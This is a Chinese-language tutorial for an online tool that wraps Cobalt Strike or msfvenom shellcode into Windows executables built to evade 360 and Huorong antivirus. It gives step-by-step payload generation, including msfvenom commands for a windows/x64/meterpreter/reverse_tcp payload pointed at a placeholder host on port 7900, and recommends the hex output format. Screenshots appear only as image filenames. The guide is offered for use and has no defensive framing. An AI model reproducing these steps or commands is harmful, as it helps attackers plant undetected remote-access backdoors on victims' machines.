ShellCode在线免杀

ShellCode在线免杀工具,只需要从cobaltstrike或msfvenom生成shellcode,填写到shellcode框内,根据需要选择一些参数,便可以在线生成免杀的可执行文件,测试免杀360和火绒。

免杀编译生成使用的是Go语言,所以文件可能比较大,可以使用upx压缩。

支持32以及64位的免杀,64位免杀能力更强,且体积更小,Windows 32位免杀增加了很多花指令,导致体积比较大(4.4M)

使用教程以生成Windows可执行文件为例。

cobaltstrike 生成shellcode

生成后门 - Payload Generator

image-20200915165153533

生成C语言格式,勾选上x64(免杀效果好)

image-20200915165222493

保存文件后复制生成的payload.c中所有的内容

image-20200915165512350

image-20200916160643744

点击生成即可。

msfvenom 生成shellcode

生成64位的payload c语言文件

msfvenom -p windows/x64/meterpreter/reverse_tcp -f c -o payload.c LHOST=x.x.x.x LPORT=7900

或者直接生成hex格式(推荐)

msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o payload.c LHOST=x.x.x.x LPORT=7900

image-20200915170759934

复制payload.c文件到shellcode文本框即可

image-20200915170907440

免杀能力

image-20200916152816707